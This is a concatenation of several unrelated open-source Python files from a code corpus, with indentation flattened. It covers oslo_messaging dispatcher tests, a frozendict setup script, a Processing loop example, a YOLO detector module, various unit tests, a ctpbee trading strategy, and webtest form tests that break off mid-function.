# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testscenarios
import time
import oslo_messaging
from oslo_messaging import rpc
from oslo_messaging import serializer as msg_serializer
from oslo_messaging.tests import utils as test_utils
from unittest import mock
load_tests = testscenarios.load_tests_apply_scenarios
class _FakeEndpoint(object):
def __init__(self, target=None):
self.target = target
def foo(self, ctxt, **kwargs):
pass
@rpc.expose
def bar(self, ctxt, **kwargs):
pass
def _foobar(self, ctxt, **kwargs):
pass
class TestDispatcher(test_utils.BaseTestCase):
scenarios = [
('no_endpoints',
dict(endpoints=[],
access_policy=None,
dispatch_to=None,
ctxt={}, msg=dict(method='foo'),
exposed_methods=['foo', 'bar', '_foobar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('default_target',
dict(endpoints=[{}],
access_policy=None,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo'),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_ctxt_and_args',
dict(endpoints=[{}],
access_policy=oslo_messaging.LegacyRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='bar'),
ctxt=dict(user='bob'), msg=dict(method='bar',
args=dict(blaa=True)),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_namespace',
dict(endpoints=[{}],
access_policy=oslo_messaging.LegacyRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace=None),
exposed_methods=['foo', 'bar', '_foobar'],
success=True, ex=None)),
('default_target_version',
dict(endpoints=[{}],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', version='1.0'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('default_target_no_such_method',
dict(endpoints=[{}],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foobar'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('namespace',
dict(endpoints=[{}, dict(namespace='testns')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=1, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('namespace_mismatch',
dict(endpoints=[{}, dict(namespace='testns')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', namespace='nstest'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('version',
dict(endpoints=[dict(version='1.5'), dict(version='3.4')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=1, method='foo'),
ctxt={}, msg=dict(method='foo', version='3.2'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('version_mismatch',
dict(endpoints=[dict(version='1.5'), dict(version='3.0')],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', version='3.2'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('message_in_null_namespace_with_multiple_namespaces',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=[None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace=None),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('message_in_wrong_namespace_with_multiple_namespaces',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=None,
ctxt={}, msg=dict(method='foo', namespace='wrong'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.UnsupportedVersion)),
('message_with_endpoint_no_private_and_public_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None])],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=True, ex=None)),
('message_with_endpoint_no_private_and_private_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.DefaultRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='_foobar'),
ctxt={}, msg=dict(method='_foobar', namespace='testns'),
exposed_methods=['foo', 'bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('message_with_endpoint_explicitly_exposed_without_exposed_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.ExplicitRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='foo'),
ctxt={}, msg=dict(method='foo', namespace='testns'),
exposed_methods=['bar'],
success=False, ex=oslo_messaging.NoSuchMethod)),
('message_with_endpoint_explicitly_exposed_with_exposed_method',
dict(endpoints=[dict(namespace='testns',
legacy_namespaces=['second', None], )],
access_policy=oslo_messaging.ExplicitRPCAccessPolicy,
dispatch_to=dict(endpoint=0, method='bar'),
ctxt={}, msg=dict(method='bar', namespace='testns'),
exposed_methods=['bar'],
success=True, ex=None)),
]
def test_dispatcher(self):
def _set_endpoint_mock_properties(endpoint):
endpoint.foo = mock.Mock(spec=dir(_FakeEndpoint.foo))
# mock doesn't pick up the decorated method.
endpoint.bar = mock.Mock(spec=dir(_FakeEndpoint.bar))
endpoint.bar.exposed = mock.PropertyMock(return_value=True)
endpoint._foobar = mock.Mock(spec=dir(_FakeEndpoint._foobar))
return endpoint
endpoints = [_set_endpoint_mock_properties(mock.Mock(
spec=_FakeEndpoint, target=oslo_messaging.Target(**e)))
for e in self.endpoints]
serializer = None
dispatcher = oslo_messaging.RPCDispatcher(endpoints, serializer,
self.access_policy)
incoming = mock.Mock(ctxt=self.ctxt, message=self.msg,
client_timeout=0)
res = None
try:
res = dispatcher.dispatch(incoming)
except Exception as ex:
self.assertFalse(self.success, ex)
self.assertIsNotNone(self.ex, ex)
self.assertIsInstance(ex, self.ex, ex)
if isinstance(ex, oslo_messaging.NoSuchMethod):
self.assertEqual(self.msg.get('method'), ex.method)
elif isinstance(ex, oslo_messaging.UnsupportedVersion):
self.assertEqual(self.msg.get('version', '1.0'),
ex.version)
if ex.method:
self.assertEqual(self.msg.get('method'), ex.method)
else:
self.assertTrue(self.success,
"Unexpected success of operation during testing")
self.assertIsNotNone(res)
for n, endpoint in enumerate(endpoints):
for method_name in self.exposed_methods:
method = getattr(endpoint, method_name)
if self.dispatch_to and n == self.dispatch_to['endpoint'] and \
method_name == self.dispatch_to['method'] and \
method_name in self.exposed_methods:
method.assert_called_once_with(
self.ctxt, **self.msg.get('args', {}))
else:
self.assertEqual(0, method.call_count,
'method: {}'.format(method))
class TestDispatcherWithPingEndpoint(test_utils.BaseTestCase):
def test_dispatcher_with_ping(self):
self.config(rpc_ping_enabled=True)
dispatcher = oslo_messaging.RPCDispatcher([], None, None)
incoming = mock.Mock(ctxt={},
message=dict(method='oslo_rpc_server_ping'),
client_timeout=0)
res = dispatcher.dispatch(incoming)
self.assertEqual('pong', res)
def test_dispatcher_with_ping_already_used(self):
class MockEndpoint(object):
def oslo_rpc_server_ping(self, ctxt, **kwargs):
return 'not_pong'
mockEndpoint = MockEndpoint()
self.config(rpc_ping_enabled=True)
dispatcher = oslo_messaging.RPCDispatcher([mockEndpoint], None, None)
incoming = mock.Mock(ctxt={},
message=dict(method='oslo_rpc_server_ping'),
client_timeout=0)
res = dispatcher.dispatch(incoming)
self.assertEqual('not_pong', res)
class TestSerializer(test_utils.BaseTestCase):
scenarios = [
('no_args_or_retval',
dict(ctxt={}, dctxt={}, args={}, retval=None)),
('args_and_retval',
dict(ctxt=dict(user='bob'),
dctxt=dict(user='alice'),
args=dict(a='a', b='b', c='c'),
retval='d')),
]
def test_serializer(self):
endpoint = _FakeEndpoint()
serializer = msg_serializer.NoOpSerializer()
dispatcher = oslo_messaging.RPCDispatcher([endpoint], serializer)
endpoint.foo = mock.Mock()
args = dict([(k, 'd' + v) for k, v in self.args.items()])
endpoint.foo.return_value = self.retval
serializer.serialize_entity = mock.Mock()
serializer.deserialize_entity = mock.Mock()
serializer.deserialize_context = mock.Mock()
serializer.deserialize_context.return_value = self.dctxt
expected_side_effect = ['d' + arg for arg in self.args]
serializer.deserialize_entity.side_effect = expected_side_effect
serializer.serialize_entity.return_value = None
if self.retval:
serializer.serialize_entity.return_value = 's' + self.retval
incoming = mock.Mock()
incoming.ctxt = self.ctxt
incoming.message = dict(method='foo', args=self.args)
incoming.client_timeout = 0
retval = dispatcher.dispatch(incoming)
if self.retval is not None:
self.assertEqual('s' + self.retval, retval)
endpoint.foo.assert_called_once_with(self.dctxt, **args)
serializer.deserialize_context.assert_called_once_with(self.ctxt)
expected_calls = [mock.call(self.dctxt, arg) for arg in self.args]
self.assertEqual(expected_calls,
serializer.deserialize_entity.mock_calls)
serializer.serialize_entity.assert_called_once_with(self.dctxt,
self.retval)
class TestMonitorFailure(test_utils.BaseTestCase):
"""Test what happens when the call monitor watchdog hits an exception when
sending the heartbeat.
"""
class _SleepyEndpoint(object):
def __init__(self, target=None):
self.target = target
def sleep(self, ctxt, **kwargs):
time.sleep(kwargs['timeout'])
return True
def test_heartbeat_failure(self):
endpoints = [self._SleepyEndpoint()]
dispatcher = oslo_messaging.RPCDispatcher(endpoints,
serializer=None)
# sleep long enough for the client_timeout to expire multiple times
# the timeout is (client_timeout/2) and must be > 1.0
message = {'method': 'sleep',
'args': {'timeout': 3.5}}
ctxt = {'test': 'value'}
incoming = mock.Mock(ctxt=ctxt, message=message, client_timeout=2.0)
incoming.heartbeat = mock.Mock(side_effect=Exception('BOOM!'))
res = dispatcher.dispatch(incoming)
self.assertTrue(res)
# only one call to heartbeat should be made since the watchdog thread
# should exit on the first exception thrown
self.assertEqual(1, incoming.heartbeat.call_count)
|
tabnine-vim/third_party/ycmd/third_party/frozendict/setup.py | MrMonk3y/vimrc | 239 | 12770629 | from distutils.core import setup
setup(
name = 'frozendict',
version = '0.3',
url = 'https://github.com/slezica/python-frozendict',
author = '<NAME>',
author_email = '<EMAIL>',
packages = ['frozendict'],
license = 'MIT License',
description = 'An immutable dictionary',
long_description = open('README.txt').read()
)
|
mode/examples/Basics/Structure/Loop/Loop.pyde | timgates42/processing.py | 1,224 | 12770637 | <reponame>timgates42/processing.py
"""
Loop.
The loop() function causes draw() to execute
repeatedly. If noLoop() is called in setup(),
draw() is only executed once. In this example,
click the mouse to execute loop(), which will
cause draw() to execute repeatedly.
"""
y = 100
def setup():
"""
The statements in the setup() function
run once when the program begins.
"""
size(640, 360) # Size should be the first statement
stroke(255) # Set stroke color to white
noLoop()
    global y  # needed so this sets the module-level y used in draw()
    y = height * 0.5
def draw():
"""
The statements in draw() are run until the
program is stopped. Each statement is run in
sequence and after the last line is read, the first
line is run again.
"""
global y
background(0) # Set the background to black
line(0, y, width, y)
y = y - 1
if y < 0:
y = height
def mousePressed():
loop()
|
model_zoo/YoloFastest/model/detector.py | danieltao1993/YoloAll | 190 | 12770639 | <reponame>danieltao1993/YoloAll
import torch
import torch.nn as nn
from model.fpn import *
from model.backbone.shufflenetv2 import *
class Detector(nn.Module):
def __init__(self, classes, anchor_num, load_param):
super(Detector, self).__init__()
out_depth = 112
stage_out_channels = [-1, 24, 48, 96, 192]
self.backbone = ShuffleNetV2(stage_out_channels, load_param)
self.fpn = LightFPN(stage_out_channels[-2] + stage_out_channels[-1], stage_out_channels[-1], out_depth)
self.output_layers = nn.Conv2d(out_depth, (5 + classes) * 3, 1, 1, 0, bias=True)
def forward(self, x):
C2, C3 = self.backbone(x)
P2, P3 = self.fpn(C2, C3)
out_2 = self.output_layers(P2)
out_3 = self.output_layers(P3)
return out_2, out_3
if __name__ == "__main__":
    model = Detector(80, 3, False)  # Detector requires load_param; False is used here as a placeholder
test_data = torch.rand(1, 3, 320, 320)
torch.onnx.export(model, #model being run
test_data, # model input (or a tuple for multiple inputs)
"test.onnx", # where to save the model (can be a file or file-like object)
export_params=True, # store the trained parameter weights inside the model file
opset_version=11, # the ONNX version to export the model to
do_constant_folding=True) # whether to execute constant folding for optimization
|
tests/unit/test_readHelper.py | woshiange/python-lambda | 1,441 | 12770670 | <filename>tests/unit/test_readHelper.py
import os
import unittest
import yaml
from aws_lambda.helpers import read
class TestReadHelper(unittest.TestCase):
TEST_FILE = "readTmp.txt"
def setUp(self):
with open(TestReadHelper.TEST_FILE, "w") as tmp_file:
tmp_file.write("testYaml: testing")
def tearDown(self):
os.remove(TestReadHelper.TEST_FILE)
def test_read_no_loader_non_binary(self):
fileContents = read(TestReadHelper.TEST_FILE)
self.assertEqual(fileContents, "testYaml: testing")
def test_read_yaml_loader_non_binary(self):
testYaml = read(TestReadHelper.TEST_FILE, loader=yaml.full_load)
self.assertEqual(testYaml["testYaml"], "testing")
def test_read_no_loader_binary_mode(self):
fileContents = read(TestReadHelper.TEST_FILE, binary_file=True)
self.assertEqual(fileContents, b"testYaml: testing")
def test_read_yaml_loader_binary_mode(self):
testYaml = read(
TestReadHelper.TEST_FILE, loader=yaml.full_load, binary_file=True
)
self.assertEqual(testYaml["testYaml"], "testing")
|
tests/http_provider_hosted_test.py | ilblackdragon/studio | 397 | 12770690 | import unittest
import os
import tempfile
import uuid
from studio import model
from model_test import get_test_experiment
# We are not currently working with HTTP providers.
@unittest.skip
class HTTPProviderHostedTest(unittest.TestCase):
def get_db_provider(self, config_name):
config_file = os.path.join(
os.path.dirname(
os.path.realpath(__file__)),
config_name)
return model.get_db_provider(model.get_config(config_file))
def test_add_get_delete_experiment(self):
with self.get_db_provider('test_config_http_client.yaml') as hp:
experiment_tuple = get_test_experiment()
hp.add_experiment(experiment_tuple[0])
experiment = hp.get_experiment(experiment_tuple[0].key)
self.assertEquals(experiment.key, experiment_tuple[0].key)
self.assertEquals(
experiment.filename,
experiment_tuple[0].filename)
self.assertEquals(experiment.args, experiment_tuple[0].args)
hp.delete_experiment(experiment_tuple[1])
self.assertTrue(hp.get_experiment(experiment_tuple[1]) is None)
def test_start_experiment(self):
with self.get_db_provider('test_config_http_client.yaml') as hp:
experiment_tuple = get_test_experiment()
hp.add_experiment(experiment_tuple[0])
hp.start_experiment(experiment_tuple[0])
experiment = hp.get_experiment(experiment_tuple[1])
self.assertTrue(experiment.status == 'running')
self.assertEquals(experiment.key, experiment_tuple[0].key)
self.assertEquals(
experiment.filename,
experiment_tuple[0].filename)
self.assertEquals(experiment.args, experiment_tuple[0].args)
hp.finish_experiment(experiment_tuple[0])
hp.delete_experiment(experiment_tuple[1])
def test_add_get_experiment_artifacts(self):
experiment_tuple = get_test_experiment()
e_experiment = experiment_tuple[0]
e_artifacts = e_experiment.artifacts
a1_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
a2_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
with open(a1_filename, 'w') as f:
f.write('hello world')
e_artifacts['a1'] = {
'local': a1_filename,
'mutable': False
}
e_artifacts['a2'] = {
'local': a2_filename,
'mutable': True
}
with self.get_db_provider('test_config_http_client.yaml') as db:
db.add_experiment(e_experiment)
experiment = db.get_experiment(e_experiment.key)
self.assertEquals(experiment.key, e_experiment.key)
self.assertEquals(experiment.filename, e_experiment.filename)
self.assertEquals(experiment.args, e_experiment.args)
db.delete_experiment(e_experiment.key)
os.remove(a1_filename)
if __name__ == '__main__':
unittest.main()
|
chamfer_pytorch/test_chamfer.py | jiyeonkim127/PSI | 138 | 12770717 | <filename>chamfer_pytorch/test_chamfer.py
import torch
import dist_chamfer as ext
distChamfer = ext.chamferDist()
from torch.autograd import Variable
def pairwise_dist(x, y):
xx, yy, zz = torch.mm(x, x.t()), torch.mm(y, y.t()), torch.mm(x, y.t())
rx = xx.diag().unsqueeze(0).expand_as(xx)
ry = yy.diag().unsqueeze(0).expand_as(yy)
P = rx.t() + ry - 2 * zz
return P
def NN_loss(x, y, dim=0):
dist = pairwise_dist(x, y)
values, indices = dist.min(dim=dim)
return values.mean()
def mydistChamfer(a, b):
x, y = a, b
bs, num_points, points_dim = x.size()
xx = torch.bmm(x, x.transpose(2, 1))
yy = torch.bmm(y, y.transpose(2, 1))
zz = torch.bmm(x, y.transpose(2, 1))
diag_ind = torch.arange(0, num_points).type(torch.cuda.LongTensor)
rx = xx[:, diag_ind, diag_ind].unsqueeze(1).expand_as(xx)
ry = yy[:, diag_ind, diag_ind].unsqueeze(1).expand_as(yy)
P = rx.transpose(2, 1) + ry - 2 * zz
return torch.min(P, 2)[0], torch.min(P, 1)[0]
def test_chamfer():
distChamfer = ext.chamferDist()
p1 = torch.rand(4, 100, 3).cuda()
p2 = torch.rand(4, 100, 3).cuda()
points1 = Variable(p1, requires_grad=True)
points2 = Variable(p2)
dist1, dist2, = distChamfer(points1, points2)
loss = torch.sum(dist1)
print(loss)
loss.backward()
print(points1.grad, points2.grad)
mydist1, mydist2 = mydistChamfer(points1, points2)
d1 = (dist1 - mydist1) ** 2
d2 = (dist2 - mydist2) ** 2
print(d1, d2)
assert (
torch.sum(d1) + torch.sum(d2) < 0.00000001
), "chamfer cuda and chamfer normal are not giving the same results"
test_chamfer()
|
examples/strategies/double_ma.py | mcFore/ctpbee | 461 | 12770727 | <filename>examples/strategies/double_ma.py
from ctpbee import CtpbeeApi, CtpBee
from ctpbee.constant import Offset, TradeData, Direction
from ctpbee.indicator.ta_lib import ArrayManager
class DoubleMaStrategy(CtpbeeApi):
def __init__(self, name):
super().__init__(name)
self.manager = ArrayManager(100)
self.instrument_set = ["rb2101.SHFE"] # 这个里面的变量 如果你开启了行情分离选项, 当数据进来的时候会判断数据 只会把相应的行情送进来, 还要就是可以通过来订阅指定行情
self.buy = 0
self.sell = 0
self.slow = 60
self.fast = 30
def on_trade(self, trade: TradeData):
if trade.offset == Offset.OPEN:
if trade.direction == Direction.LONG:
self.buy += trade.volume
else:
self.sell += trade.volume
else:
if trade.direction == Direction.LONG:
self.sell -= trade.volume
else:
self.buy -= trade.volume
def on_bar(self, bar):
""" """
self.manager.add_data(bar)
if not self.manager.inited:
return
fast_avg = self.manager.sma(self.fast, array=True)
slow_avg = self.manager.sma(self.slow, array=True)
if slow_avg[-2] < fast_avg[-2] and slow_avg[-1] >= fast_avg[-1]:
self.action.cover(bar.close_price, self.buy, bar)
self.action.sell(bar.close_price, 3, bar)
if fast_avg[-2] < slow_avg[-2] and fast_avg[-1] >= slow_avg[-1]:
self.action.sell(bar.close_price, self.sell, bar)
self.action.buy(bar.close_price, 3, bar)
def on_tick(self, tick):
pass
def on_init(self, init: bool):
print("初始化成功了, 这里可能会触发两次哦")
if __name__ == '__main__':
app = CtpBee("doublema", __name__, refresh=True)
app.config.from_mapping({
"CONNECT_INFO": {
"userid": "089131",
"password": "<PASSWORD>",
"brokerid": "9999",
"md_address": "tcp://172.16.17.32:10112",
"td_address": "tcp://172.16.17.32:10102",
"product_info": "",
"appid": "simnow_client_test",
"auth_code": "0000000000000000"
},
"INTERFACE": "ctp", # 接口声明
"TD_FUNC": True, # 开启交易功能
"MD_FUNC": True,
"XMIN": [1]
})
strategy = DoubleMaStrategy("doublema")
app.add_extension(strategy)
app.start()
|
tests/test_forms.py | azmeuk/webtest | 239 | 12770747 | <gh_stars>100-1000
import cgi
import os.path
import struct
import sys
import webtest
from webob import Request
from webtest.debugapp import DebugApp
from webtest.compat import to_bytes
from webtest.forms import NoValue, Submit, Upload
from tests.compat import unittest
from tests.compat import u
class TestForms(unittest.TestCase):
def callFUT(self, filename='form_inputs.html', formid='simple_form'):
dirname = os.path.join(os.path.dirname(__file__), 'html')
app = DebugApp(form=os.path.join(dirname, filename), show_form=True)
resp = webtest.TestApp(app).get('/form.html')
return resp.forms[formid]
def test_set_submit_field(self):
form = self.callFUT()
self.assertRaises(
AttributeError,
form['submit'].value__set,
'foo'
)
def test_button(self):
form = self.callFUT()
button = form['button']
self.assertTrue(isinstance(button, Submit),
"<button> without type is a submit button")
def test_button_value_if_submitted(self):
form = self.callFUT()
submit = form['submit']
self.assertEqual(
submit.value_if_submitted(), '',
"submit default value is ''")
button = form['button']
self.assertEqual(
button.value_if_submitted(), '',
"submit default value is ''")
def test_force_select(self):
form = self.callFUT()
form['select'].force_value('notavalue')
form['select'].value__set('value3')
self.assertTrue(
form['select']._forced_value is NoValue,
"Setting a value after having forced a value should keep a forced"
" state")
self.assertEqual(
form['select'].value, 'value3',
"the value should the the one set by value__set")
self.assertEqual(
form['select'].selectedIndex, 2,
"the value index should be the one set by value__set")
def test_form_select(self):
form = self.callFUT()
form.select('select', 'value1')
self.assertEqual(
form['select'].value, 'value1',
"when using form.select, the input selected value should be "
"changed")
def test_get_field_by_index(self):
form = self.callFUT()
self.assertEqual(form['select'],
form.get('select', index=0))
def test_get_unknown_field(self):
form = self.callFUT()
self.assertEqual(form['unknown'].value, '')
form['unknown'].value = '1'
self.assertEqual(form['unknown'].value, '1')
def test_get_non_exist_fields(self):
form = self.callFUT()
self.assertRaises(AssertionError, form.get, 'nonfield')
def test_get_non_exist_fields_with_default(self):
form = self.callFUT()
value = form.get('nonfield', default=1)
self.assertEqual(value, 1)
def test_upload_fields(self):
form = self.callFUT()
fu = webtest.Upload(__file__)
form['file'] = fu
self.assertEqual(form.upload_fields(),
[['file', __file__]])
def test_repr(self):
form = self.callFUT()
self.assertTrue(repr(form).startswith('<Form id='))
def test_the_bs_node_must_not_change(self):
form = self.callFUT()
self.assertEqual(form.text, str(form.html))
def test_set_multiple_checkboxes(self):
form = self.callFUT(formid='multiple_checkbox_form')
form['checkbox'] = [10, 30]
self.assertEqual(form.get('checkbox', index=0).value, '10')
self.assertEqual(form.get('checkbox', index=1).value, None)
self.assertEqual(form.get('checkbox', index=2).value, '30')
def test_button_submit(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action')
self.assertIn(u("action=deactivate"), display, display)
def test_button_submit_by_index(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action', index=1)
self.assertIn(u("action=activate"), display, display)
def test_button_submit_by_value(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action', value='activate')
self.assertIn(u("action=activate"), display, display)
def test_button_submit_by_value_and_index(self):
form = self.callFUT(formid='multiple_buttons_form')
self.assertRaises(ValueError,
form.submit, "action", value="activate",
index=0)
class TestResponseFormAttribute(unittest.TestCase):
def callFUT(self, body):
app = DebugApp(form=to_bytes(body))
return webtest.TestApp(app)
def test_no_form(self):
app = self.callFUT('<html><body></body></html>')
res = app.get('/form.html')
self.assertRaises(TypeError, lambda: res.form)
def test_too_many_forms(self):
app = self.callFUT(
'<html><body><form></form><form></form></body></html>')
res = app.get('/form.html')
self.assertRaises(TypeError, lambda: res.form)
class TestInput(unittest.TestCase):
def callFUT(self, filename='form_inputs.html'):
dirname = os.path.join(os.path.dirname(__file__), 'html')
app = DebugApp(form=os.path.join(dirname, filename), show_form=True)
return webtest.TestApp(app)
def test_input(self):
app = self.callFUT()
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
form = res.forms['radio_input_form']
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form['foo'].value, 'baz')
self.assertEqual(form.submit_fields(), [('foo', 'baz')])
form = res.forms['checkbox_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
def test_force_radio_input(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms['radio_input_form']
form['foo'].force_value('fido')
self.assertEqual(form['foo'].value, 'fido')
self.assertEqual(form.submit_fields(), [('foo', 'fido')])
def test_radio_input_order(self):
app = self.callFUT()
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['complex_radio_input_form']
form['foo'].value = 'true'
self.assertEqual(form['foo'].value, 'true')
self.assertEqual(form['foo'].selectedIndex, 0)
self.assertEqual(form.submit_fields(), [
('__start__', 'item:mapping'),
('foo', 'true'),
('__end__', 'item:mapping'),
('__start__', 'item:mapping'),
('__end__', 'item:mapping')])
res = app.get('/form.html')
form = res.forms['complex_radio_input_form']
self.assertEqual(form['foo'].value, 'true')
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form.submit_fields(), [
('__start__', 'item:mapping'),
('__end__', 'item:mapping'),
('__start__', 'item:mapping'),
('foo', 'true'),
('__end__', 'item:mapping')])
def test_input_unicode(self):
app = self.callFUT('form_unicode_inputs.html')
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
self.assertEqual(res.charset.lower(), 'utf-8')
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
form = res.forms['radio_input_form']
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form['foo'].value, u('Блок'))
self.assertEqual(form.submit_fields(), [('foo', u('Блок'))])
form = res.forms['checkbox_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
def test_input_no_default(self):
app = self.callFUT('form_inputs_with_defaults.html')
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, '')
self.assertEqual(form.submit_fields(), [('foo', '')])
form = res.forms['radio_input_form']
self.assertTrue(form['foo'].value is None)
self.assertEqual(form.submit_fields(), [])
form = res.forms['checkbox_input_form']
self.assertTrue(form['foo'].value is None)
self.assertEqual(form.submit_fields(), [])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, '')
self.assertEqual(form.submit_fields(), [('foo', '')])
def test_textarea_entities(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms.get("textarea_input_form")
self.assertEqual(form.get("textarea").value, "'foo&bar'")
self.assertEqual(form.submit_fields(), [('textarea', "'foo&bar'")])
def test_textarea_emptyfirstline(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms.get("textarea_emptyline_form")
self.assertEqual(form.get("textarea").value, "aaa")
self.assertEqual(form.submit_fields(), [('textarea', "aaa")])
class TestFormLint(unittest.TestCase):
def test_form_lint(self):
form = webtest.Form(None, '''<form>
<input type="text" name="field"/>
</form>''')
self.assertRaises(AttributeError, form.lint)
form = webtest.Form(None, '''<form>
<input type="text" id="myfield" name="field"/>
</form>''')
self.assertRaises(AttributeError, form.lint)
form = webtest.Form(None, '''<form>
<label for="myfield">my field</label>
<input type="text" id="myfield" name="field"/>
</form>''')
form.lint()
form = webtest.Form(None, '''<form>
<label class="field" for="myfield" role="r">my field</label>
<input type="text" id="myfield" name="field"/>
</form>''')
form.lint()
def select_app(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="4">Four</option>
<option value="5" selected="selected">Five</option>
<option value="6">Six</option>
<option value="7">Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple>
<option value="8" selected="selected">Eight</option>
<option value="9">Nine</option>
<option value="10">Ten</option>
<option value="11" selected="selected">Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_without_values(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option>Four</option>
<option>Five</option>
<option>Six</option>
<option>Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option>Eight</option>
<option selected value="Nine">Nine</option>
<option>Ten</option>
<option selected>Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_without_default(environ, start_response):
req = Request(environ)
